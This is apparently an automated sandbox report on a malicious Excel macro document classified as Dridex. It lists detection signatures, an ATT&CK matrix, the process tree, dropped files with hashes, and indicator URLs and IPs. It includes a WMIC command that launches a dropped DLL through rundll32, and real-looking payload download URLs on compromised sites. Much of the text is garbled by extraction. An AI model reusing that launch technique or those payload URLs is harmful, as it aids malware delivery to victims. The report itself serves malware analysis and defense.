Automated Malware Analysis Report for as6xxgzNFj.xls - Generated ...

ID: 424660Sample Name: as6xxgzNFj.xlsCookbook:defaultwindowsofficecookbook.jbsTime: 08:36:53Date: 26/05/2021Version: 32.0.0 Black Diamond

255555555555566666667888899999999

1010111111111111111212141414141414141515151515

15

Table of Contents

Table of ContentsAnalysis Report as6xxgzNFj.xls

OverviewGeneral InformationDetectionSignaturesClassification

Process TreeMalware ConfigurationYara Overview

Memory DumpsSigma Overview

System Summary:Signature Overview

AV Detection:Software Vulnerabilities:E-Banking Fraud:System Summary:Persistence and Installation Behavior:

Mitre Att&ck MatrixBehavior GraphScreenshots

ThumbnailsAntivirus, Machine Learning and Genetic Malware Detection

Initial SampleDropped FilesUnpacked PE FilesDomainsURLs

Domains and IPsContacted DomainsURLs from Memory and BinariesContacted IPsPublic

General InformationSimulations

Behavior and APIsJoe Sandbox View / Context

IPsDomainsASNJA3 FingerprintsDropped Files

Created / dropped FilesStatic File Info

GeneralFile IconStatic OLE Info

GeneralOLE File "as6xxgzNFj.xls"IndicatorsSummaryDocument SummaryStreams with VBA

VBA File Name: Sheet1.cls, Stream Size: 991General

VBA Code Keywords

Copyright Joe Security LLC 2021 of 69

151515

16161616

16161616

17171717

17191919

19212121

22242424

25262626

26303030

30343535

35383838

38424243

43474747

4751

515151515152525252525252525353535353535353545454545454545455555555555555

VBA CodeVBA File Name: Sheet2.cls, Stream Size: 991General

VBA Code KeywordsVBA CodeVBA File Name: Sheet3.cls, Stream Size: 991General

VBA Code KeywordsVBA CodeVBA File Name: ThisWorkbook.cls, Stream Size: 1779General

VBA Code KeywordsVBA CodeVBA File Name: abusersimputativemisguggle.bas, Stream Size: 4658General

VBA Code KeywordsVBA CodeVBA File Name: acaciaromanticallylamprophyres.bas, Stream Size: 4484General

VBA Code KeywordsVBA CodeVBA File Name: adventuringequalitycrosswords.bas, Stream Size: 6739General

VBA Code KeywordsVBA CodeVBA File Name: counterclaimedattractantsblasp.bas, Stream Size: 3737General

VBA Code KeywordsVBA CodeVBA File Name: filingschoicenessesfunnelingsy.bas, Stream Size: 44360General

VBA Code KeywordsVBA CodeVBA File Name: intitulesalertheterosporiesamp.bas, Stream Size: 155385General

VBA Code KeywordsVBA CodeVBA File Name: nucleidesdisgestedmercerisesdu.bas, Stream Size: 7272General

VBA Code KeywordsVBA CodeVBA File Name: schlubupleaningfarmhouse.bas, Stream Size: 12837General

VBA Code KeywordsVBA CodeVBA File Name: surveyalscosmotheticalmarcesce.bas, Stream Size: 19978General

VBA Code KeywordsVBA CodeVBA File Name: zoographistsuphuddentiltsnoven.bas, Stream Size: 20066General

VBA Code KeywordsVBA Code

StreamsStream Path: \x1CompObj, File Type: data, Stream Size: 107GeneralStream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 284GeneralStream Path: \x5SummaryInformation, File Type: data, Stream Size: 320GeneralStream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 52696GeneralStream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 1424GeneralStream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 1001GeneralStream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 8464GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 4241GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 1176GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_10, File Type: data, Stream Size: 306GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_11, File Type: data, Stream Size: 362GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_12, File Type: data, Stream Size: 171GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_13, File Type: data, Stream Size: 170GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_14, File Type: data, Stream Size: 171GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_15, File Type: data, Stream Size: 170GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 171GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 170GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 502


55555656565656565656565757575757575757585858585858

585859606161616161616262626262636364

646464

686869

6969

GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 618GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_6, File Type: data, Stream Size: 171GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_7, File Type: data, Stream Size: 170GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_8, File Type: data, Stream Size: 261GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_9, File Type: data, Stream Size: 298GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_a, File Type: data, Stream Size: 171GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_b, File Type: data, Stream Size: 170GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_c, File Type: data, Stream Size: 170GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_d, File Type: data, Stream Size: 156GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_e, File Type: data, Stream Size: 208GeneralStream Path: _VBA_PROJECT_CUR/VBA/__SRP_f, File Type: data, Stream Size: 234GeneralStream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: MIPSEB MIPS-III ECOFF executable not stripped - version 72.3, Stream Size: 1604General

Network BehaviorNetwork Port DistributionTCP PacketsUDP PacketsDNS QueriesDNS AnswersHTTPS Packets

Code ManipulationsStatistics

BehaviorSystem Behavior

Analysis Process: EXCEL.EXE PID: 2312 Parent PID: 584GeneralFile Activities

File CreatedFile DeletedFile MovedFile Written

Registry ActivitiesKey CreatedKey Value Created

Analysis Process: WMIC.exe PID: 2344 Parent PID: 2312GeneralFile Activities

DisassemblyCode Analysis


Analysis Report as6xxgzNFj.xls

Overview

General Information

Sample Name:

as6xxgzNFj.xls

Analysis ID: 424660

MD5: 662ed1aced50ca…

SHA1: 59b1bb6143562fb…

SHA256: 995cc400362eaa…

Tags: xls

Infos:

Most interesting Screenshot:

Detection

DridexDridex

Score: 100

Range: 0 - 100

Whitelisted: false

Confidence: 100%

Signatures

Document exploit detected (creates






Document exploit detected (creates Document exploit detected (creates ……

Document exploit detected (drops P






Document exploit detected (drops PDocument exploit detected (drops P……

Multi AV Scanner detection for subm






Multi AV Scanner detection for submMulti AV Scanner detection for subm……

Office document tries to convince vi






Office document tries to convince viOffice document tries to convince vi……

Yara detected Dridex unpacked file






Yara detected Dridex unpacked fileYara detected Dridex unpacked file

Contains functionality to create proc






Contains functionality to create procContains functionality to create proc……

Creates processes via WMI






Creates processes via WMICreates processes via WMI

Document contains an embedded VB






Document contains an embedded VBDocument contains an embedded VB……






















Document exploit detected (process






Document exploit detected (processDocument exploit detected (process……

Found PHP interpreter






Found PHP interpreterFound PHP interpreter

Machine Learning detection for dropp






Machine Learning detection for droppMachine Learning detection for dropp……

Machine Learning detection for samp






Machine Learning detection for sampMachine Learning detection for samp……

Office process drops PE file






Office process drops PE fileOffice process drops PE file

Sigma detected: Microsoft Office Pr






Sigma detected: Microsoft Office PrSigma detected: Microsoft Office Pr……

Sigma detected: Suspicious WMI Ex






Sigma detected: Suspicious WMI ExSigma detected: Suspicious WMI Ex……








Document contains embedded VBA






Document contains embedded VBA Document contains embedded VBA ……

Drops PE files

Drops PE files

Drops PE files

Drops PE files

Drops PE files

Drops PE files

Drops PE filesDrops PE files

Drops files with a non-matching file e






Drops files with a non-matching file eDrops files with a non-matching file e……

Found dropped PE file which has no






Found dropped PE file which has noFound dropped PE file which has no……

JA3 SSL client fingerprint seen in co






JA3 SSL client fingerprint seen in coJA3 SSL client fingerprint seen in co……

May sleep (evasive loops) to hinder






May sleep (evasive loops) to hinder May sleep (evasive loops) to hinder ……

Potential document exploit detected






Potential document exploit detectedPotential document exploit detected……















Classification

Malware Configuration

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Ransomware

Spreading

Phishing

Banker

Trojan / Bot

Adware

Spyware

Exploiter

Evader

Miner

clean

clean

clean

clean

clean

clean

clean

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

suspicious

malicious

malicious

malicious

malicious

malicious

malicious

malicious

System is w7x64

EXCEL.EXE (PID: 2312 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

WMIC.exe (PID: 2344 cmdline: 'C:\Windows\System32\wbem\WMIC.exe' process call create 'rundll32.exe 'C:\Users\user\AppData\Roaming\25793.dll' CscNetApiGetInterface'

MD5: FD902835DEAEF4091799287736F3A028)cleanup

No configs have been found

Source Rule Description Author Strings

00000006.00000002.2350333688.000000006FBA1000.00000020.00020000.sdmp

JoeSecurity_Dridex_1 Yara detected Dridex unpacked file

Joe Security

Process Tree

Yara Overview

Memory Dumps


Sigma detected: Suspicious WMI Execution Using Rundll32

Signature Overview

• AV Detection

• Compliance

• Software Vulnerabilities

• Networking

• E-Banking Fraud

• System Summary

• Data Obfuscation

• Persistence and Installation Behavior

• Hooking and other Techniques for Hiding and Protection

• Malware Analysis System Evasion

• Language, Device and Operating System Detection

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for submitted file

Machine Learning detection for dropped file

Machine Learning detection for sample

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Document exploit detected (process start blacklist hit)

E-Banking Fraud:


System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Contains functionality to create processes via WMI

Document contains an embedded VBA macro with suspicious strings

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Document contains an embedded VBA with functions possibly related to HTTP operations

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)



Persistence and Installation Behavior:


Mitre Att&ck MatrixCopyright Joe Security LLC 2021 of 69

InitialAccess Execution Persistence

PrivilegeEscalation Defense Evasion

CredentialAccess Discovery

LateralMovement Collection Exfiltration

Commandand Control

NetworkEffects

ValidAccounts

WindowsManagementInstrumentation 2 1

PathInterception

ProcessInjection 1

Masquerading 1 1 OSCredentialDumping

Virtualization/SandboxEvasion 1

RemoteServices

Data fromLocalSystem

ExfiltrationOver OtherNetworkMedium

EncryptedChannel 2

Eavesdrop onInsecureNetworkCommunication

DefaultAccounts

Scripting 5 2 Boot orLogonInitializationScripts

Boot orLogonInitializationScripts

Disable or ModifyTools 1

LSASSMemory

File and DirectoryDiscovery 1

RemoteDesktopProtocol

Data fromRemovableMedia

ExfiltrationOverBluetooth

Ingress ToolTransfer 1

Exploit SS7 toRedirect PhoneCalls/SMS

DomainAccounts

Exploitation for ClientExecution 3 3

Logon Script(Windows)

LogonScript(Windows)

Virtualization/SandboxEvasion 1

SecurityAccountManager

System InformationDiscovery 4

SMB/WindowsAdmin Shares

Data fromNetworkSharedDrive

AutomatedExfiltration

Non-ApplicationLayerProtocol 1

Exploit SS7 toTrack DeviceLocation

LocalAccounts

At (Windows) Logon Script(Mac)

LogonScript(Mac)

Process Injection 1 NTDS System NetworkConfigurationDiscovery

DistributedComponentObject Model

InputCapture

ScheduledTransfer

ApplicationLayerProtocol 1 2

SIM CardSwap

CloudAccounts

Cron NetworkLogon Script

NetworkLogonScript

Scripting 5 2 LSASecrets

Remote SystemDiscovery

SSH Keylogging DataTransferSize Limits

FallbackChannels

ManipulateDeviceCommunication

ReplicationThroughRemovableMedia

Launchd Rc.common Rc.common Obfuscated Files orInformation 1

CachedDomainCredentials

System Owner/UserDiscovery

VNC GUI InputCapture

ExfiltrationOver C2Channel

MultibandCommunication

Jamming orDenial ofService

ExternalRemoteServices

Scheduled Task StartupItems

StartupItems

Software Packing 1 DCSync Network Sniffing WindowsRemoteManagement

Web PortalCapture

ExfiltrationOverAlternativeProtocol

CommonlyUsed Port

Rogue Wi-FiAccess Points

Behavior GraphID: 424660

Sample: as6xxgzNFj.xls

Startdate: 26/05/2021

Architecture: WINDOWS

Score: 100

Multi AV Scanner detectionfor submitted file

Document exploit detected(drops PE files)

Office document triesto convince victim to

disable security protection(e.g. to enable ActiveX

or Macros)

13 other signatures

EXCEL.EXE

61 26

started

gettingreadytolearn.co.uk

109.169.78.226, 443, 49167

IOMART-APAC-ASAPACandMiddleEastFR

United Kingdom

C:\Users\user\AppData\Roaming\25793.dll, PE32

dropped

C:\Users\user\AppData\...\BeAsmBuB[1].php, PE32

dropped

Document exploit detected(creates forbidden files)

WMIC.exe

started

Creates processes viaWMI

Legend:

Process

Signature

Created File

DNS/IP Info

Is Dropped

Is Windows Process

Number of created Registry Values

Number of created Files

Visual Basic

Delphi

Java

.Net C# or VB.NET

C, C++ or other language

Is malicious

Internet

Hide Legend

Behavior Graph


ThumbnailsThis section contains all screenshots as thumbnails, including those not shown in the slideshow.

Source Detection Scanner Label Link

as6xxgzNFj.xls 32% Virustotal Browse

as6xxgzNFj.xls 22% ReversingLabs Script-Macro.Dropper.Maldade

as6xxgzNFj.xls 100% Joe Sandbox ML

Screenshots

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample


https://www.virustotal.com/gui/file/995cc400362eaa95d528dffef31bb08e173f2cabb8b5fb0e02f2134388800c48/detection/f-995cc400362eaa95d528dffef31bb08e173f2cabb8b5fb0e02f2134388800c48-1621976779


C:\Users\user\AppData\Roaming\25793.dll 100% Joe Sandbox ML

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BeAsmBuB[1].php

100% Joe Sandbox ML

No Antivirus matches


gettingreadytolearn.co.uk 0% Virustotal Browse


https://bonsaisupreme.com/old-data/wp-includes/js/tinymce/langs/I0UM7jBKmZmJB.php 1% Virustotal Browse

https://bonsaisupreme.com/old-data/wp-includes/js/tinymce/langs/I0UM7jBKmZmJB.php 0% Avira URL Cloud safe

https://661partyrentals.com/wp-content/plugiG 0% Avira URL Cloud safe

www.php.netD 0% Avira URL Cloud safe

https://app6.salesdatagenerator.com/wp-conten 0% Avira URL Cloud safe

https://gettingreadytolearn.co. 0% Avira URL Cloud safe

https://tsc-somali.com/wordpress/wp-includes/sodium_compat/src/Core/FO8NNRuR.phpka;t_yu1 0% Avira URL Cloud safe

https://ms-onlinestore.com/wp-content/plugins/edgtf-membership/widgets/l 0% Avira URL Cloud safe

servername/isapibackend.dll 0% Avira URL Cloud safe

https://getitsolutions.in/lib/boot 0% Avira URL Cloud safe

https://afemnor.es/wp-content/themes/dt-the7 0% Avira URL Cloud safe

https://scgtech.in 0% Avira URL Cloud safe

Name IP Active Malicious Antivirus Detection Reputation

gettingreadytolearn.co.uk 109.169.78.226 true false 0%, Virustotal, Browse unknown

Name Source Malicious Antivirus Detection Reputation

https://bonsaisupreme.com/old-data/wp-includes/js/tinymce/langs/I0UM7jBKmZmJB.php

as6xxgzNFj.xls false 1%, Virustotal, BrowseAvira URL Cloud: safe

unknown

https://661partyrentals.com/wp-content/plugiG as6xxgzNFj.xls false Avira URL Cloud: safe unknown

www.php.netD 25793.dll.0.dr false Avira URL Cloud: safe unknown

https://app6.salesdatagenerator.com/wp-conten as6xxgzNFj.xls false Avira URL Cloud: safe unknown

https://gettingreadytolearn.co. as6xxgzNFj.xls false Avira URL Cloud: safe unknown

https://tsc-somali.com/wordpress/wp-includes/sodium_compat/src/Core/FO8NNRuR.phpka;t_yu1

as6xxgzNFj.xls false Avira URL Cloud: safe unknown

https://ms-onlinestore.com/wp-content/plugins/edgtf-membership/widgets/l

as6xxgzNFj.xls false Avira URL Cloud: safe unknown

servername/isapibackend.dll WMIC.exe, 00000003.00000002.2087122583.0000000001BC0000.00000002.00000001.sdmp

false Avira URL Cloud: safe low

https://getitsolutions.in/lib/boot as6xxgzNFj.xls false Avira URL Cloud: safe unknown

https://afemnor.es/wp-content/themes/dt-the7 as6xxgzNFj.xls false Avira URL Cloud: safe unknown

https://scgtech.in as6xxgzNFj.xls false Avira URL Cloud: safe unknown

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs


https://www.virustotal.com/gui/url/c81f6fb6c00f4fa23691199052c22d25ee1874b993c383662c3c2d0d80bb82e6/detection/u-c81f6fb6c00f4fa23691199052c22d25ee1874b993c383662c3c2d0d80bb82e6-1565410593

https://www.virustotal.com/gui/url/cba40b0a98d4a7f8bbcec89e98d4bc80b4d2ccb4a09af24583d18f43e4253a58/detection/u-cba40b0a98d4a7f8bbcec89e98d4bc80b4d2ccb4a09af24583d18f43e4253a58-1621999020

https://www.virustotal.com/gui/url/c81f6fb6c00f4fa23691199052c22d25ee1874b993c383662c3c2d0d80bb82e6/detection/u-c81f6fb6c00f4fa23691199052c22d25ee1874b993c383662c3c2d0d80bb82e6-1565410593

https://www.virustotal.com/gui/url/cba40b0a98d4a7f8bbcec89e98d4bc80b4d2ccb4a09af24583d18f43e4253a58/detection/u-cba40b0a98d4a7f8bbcec89e98d4bc80b4d2ccb4a09af24583d18f43e4253a58-1621999020

General Information

Joe Sandbox Version: 32.0.0 Black Diamond

Analysis ID: 424660

Start date: 26.05.2021

Start time: 08:36:53

Joe Sandbox Product: CloudBasic

Overall analysis duration: 0h 4m 37s

Hypervisor based Inspection enabled: false

Report type: light

Sample file name: as6xxgzNFj.xls

Cookbook file name: defaultwindowsofficecookbook.jbs

Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)

Run name: Without Instrumentation

Number of analysed new started processes analysed: 7

Number of new started drivers analysed: 0

Number of existing processes analysed: 0

Number of existing drivers analysed: 0

Number of injected processes analysed: 0

Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled

Analysis Mode: default

Analysis stop reason: Timeout

Detection: MAL

Classification: mal100.troj.expl.evad.winXLS@3/6@1/1

No. of IPs < 25%

25% < No. of IPs < 50%

50% < No. of IPs < 75%

75% < No. of IPs

IP Domain Country Flag ASN ASN Name Malicious

109.169.78.226 gettingreadytolearn.co.uk United Kingdom 25108 IOMART-APAC-ASAPACandMiddleEastFR

false

Public


EGA Information: Failed

HDC Information: Failed

HCA Information: Successful, ratio: 100%Number of executed functions: 0Number of non-executed functions: 0

Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .xlsFound Word or Excel or PowerPoint or XPS ViewerAttach to Office via COMScroll downClose Viewer

Warnings:Exclude process from analysis (whitelisted): dllhost.exe, rundll32.exe, conhost.exeTCP Packets have been reduced to 100Excluded IPs from analysis (whitelisted): 93.184.221.240Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net

Time Type Description

08:37:40 API Interceptor 9x Sleep call for process: WMIC.exe modified

No context

No context

No context

Match Associated Sample Name / URL SHA 256 Detection Link Context

7dcce5b76c8b17472d024758970a406b analysis-580578951.xls Get hash malicious Browse 109.169.78.226

Contract 2021080378818.xlsx Get hash malicious Browse 109.169.78.226

PO 474050.xls Get hash malicious Browse 109.169.78.226

research-1748832384.xls Get hash malicious Browse 109.169.78.226

c9d2a3fKe7.xls Get hash malicious Browse 109.169.78.226

daa5376b_by_Libranalysis.xls Get hash malicious Browse 109.169.78.226

analysis-558814486.xls Get hash malicious Browse 109.169.78.226

14faa410_by_Libranalysis.xls Get hash malicious Browse 109.169.78.226

diagram-673579741.xls.xls Get hash malicious Browse 109.169.78.226

Soumissions-993235.doc Get hash malicious Browse 109.169.78.226

analysis-1134364064.xls Get hash malicious Browse 109.169.78.226

f2079b30_by_Libranalysis.xls Get hash malicious Browse 109.169.78.226

8b664227_by_Libranalysis.ppt Get hash malicious Browse 109.169.78.226

Show All

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints


https://view.joesandbox.com/analysis/334357/html/none?idtype=webid#static

https://view.joesandbox.com/analysis/334357/html/none?idtype=webid

























2a8091dd_by_Libranalysis.xls Get hash malicious Browse 109.169.78.226


a9afdac1_by_Libranalysis.docx Get hash malicious Browse 109.169.78.226

bd42b1ee_by_Libranalysis.xls Get hash malicious Browse 109.169.78.226

0b6536b0_by_Libranalysis.xls Get hash malicious Browse 109.169.78.226

9d2c79aa_by_Libranalysis.xls Get hash malicious Browse 109.169.78.226


Match Associated Sample Name / URL SHA 256 Detection Link Context

No context

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: Microsoft Cabinet archive data, 59863 bytes, 1 file

Category: dropped

Size (bytes): 59863

Entropy (8bit): 7.99556910241083

Encrypted: true

SSDEEP: 1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/

MD5: 15775D95513782F99CDFB17E65DFCEB1

SHA1: 6C11F8BEE799B093F9FF4841E31041B081B23388

SHA-256: 477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00

SHA-512: AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7

Malicious: false

Reputation: moderate, very likely benign file

Preview:MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: data

Category: dropped

Size (bytes): 326

Entropy (8bit): 3.149293041712097

Encrypted: false

SSDEEP: 6:kKRpkQSN+SkQlPlEGYRMY9z+4KlDA3RUeSKyzkOt:5phZkPlE99SNxAhUeSKO

MD5: E16FE0624DE8BB9F7DAD9C594CDE6138

SHA1: 994E0F2FC5C14C2D7FB218E68E2B12A1042426FE

SHA-256: D8D0C09CD7C5DB1B1A00EBE50A02188096F25A3A7C6FDBA67E117533B1594036

SHA-512: 2543D8DCF26D6C41CFB3034CDE3DA56CDD3E1F8FCA36D9126A8E6733702F1D178A37C4E6375F5CB8CF385C1A13B0C0EBDEAF029389B888BA23F0DFA100AD9581

Malicious: false

Reputation: low

Preview:p...... ........^.'.ER..(....................................................... ...........Y5......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.f.8.8.3.5.9.3.5.d.7.1.:.0."...



File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

Category: downloaded

Size (bytes): 175616

Entropy (8bit): 7.528421123053496

Encrypted: false

SSDEEP: 3072:y6A3/0n2RB7qAPI6wnX9kWRx5lUgMSmgEogJmPIpalYWX2:yJ3/02bWAANnX97LUgR+ogJRoYa

MD5: 4749F961A93FE814B1267C9AC2678317

Dropped Files

Created / dropped Files
















SHA1: 6A6A058B75951BF688605FB5DBE358CC50778E5E

SHA-256: C0802735A537B2F8A908FB58B05B38CAB10DC67497A9D67FA8BA96A01C0208AA

SHA-512: B67B1D66D05131B90C357C130D7A42A8E52F4B669A5A8F7F05B4F5DC64A37B8F97EA6201A2DFF81A81D088FAEF65CDAC2CC527CEA947CA0CBB79450CD142FE61

Malicious: true

Antivirus: Antivirus: Joe Sandbox ML, Detection: 100%

Reputation: low

IE Cache URL: https://gettingreadytolearn.co.uk/portal/wall/posts/157/thumbs/BeAsmBuB.php

Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:.3.[.`.[.`.[.`..p`6[.`!.;`.Z.`.".`2Z.`.[.`.[.`..(` Z.`6.*`.Z.`...`.Z.`..`*Z.`F..a.Z.`.-x`-Z.`f..a.Z.`../`.Z.`f..aW[.`...`.[.`!.;`.[.`Rich.[.`....................................................................................................................PE..L.....`...........!.........f.......m.......p............................................@..........................z..[...h{..........p...........................0`..8............................................p..T............................text...N_.......`.................. ..`.rdata.......p.......d..............@[email protected]....`C.......([email protected]...............................@[email protected][email protected]....................................................................................................................................................................


C:\Users\user\AppData\Local\Temp\CabD26C.tmp


File Type: Microsoft Cabinet archive data, 59863 bytes, 1 file

Category: dropped

Size (bytes): 59863

Entropy (8bit): 7.99556910241083

Encrypted: true

SSDEEP: 1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/

MD5: 15775D95513782F99CDFB17E65DFCEB1

SHA1: 6C11F8BEE799B093F9FF4841E31041B081B23388

SHA-256: 477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00

SHA-512: AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7

Malicious: false


Preview:MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.

C:\Users\user\AppData\Local\Temp\TarD26D.tmpProcess: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File Type: data

Category: dropped


Entropy (8bit): 6.3086528024913715

Encrypted: false

SSDEEP: 1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA

MD5: 78CABD9F1AFFF17BB91A105CF4702188

SHA1: 52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7

SHA-256: C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066

SHA-512: F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B

Malicious: false


